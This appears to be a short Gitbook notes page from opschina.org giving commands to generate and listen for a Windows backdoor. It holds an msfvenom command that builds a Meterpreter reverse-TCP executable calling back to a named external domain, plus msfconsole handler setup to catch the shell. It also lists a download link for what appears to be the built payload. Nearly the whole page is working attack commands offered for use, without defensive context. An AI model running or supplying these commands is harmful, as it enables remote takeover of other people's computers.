Windows
# 生成
msfvenom -p windows/meterpreter/reverse_tcp LHOST=bd.opschina.org LPORT=4445 -b "\x00" -f exe -o bd.win32.exe

# 监听
msfconsole -q -x "use exploit/multi/handler;set PAYLOAD windows/x86/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 4445; run; exit -y"

use exploit/multi/handler
set LHOST 0.0.0.0
set LPORT 4445
set PAYLOAD windows/meterpreter/reverse_tcp
set ExitOnSession false
exploit -j -z


http://ojv12llai.bkt.clouddn.com/uploads/20170421161635.exe
> bd.win32.exe
Copyright © opschina.org 2017 with zzlyzq@gmail.com all right reserved,powered by Gitbook该文件修订时间: 2017-07-11 11:32:48

results matching ""

    No results matching ""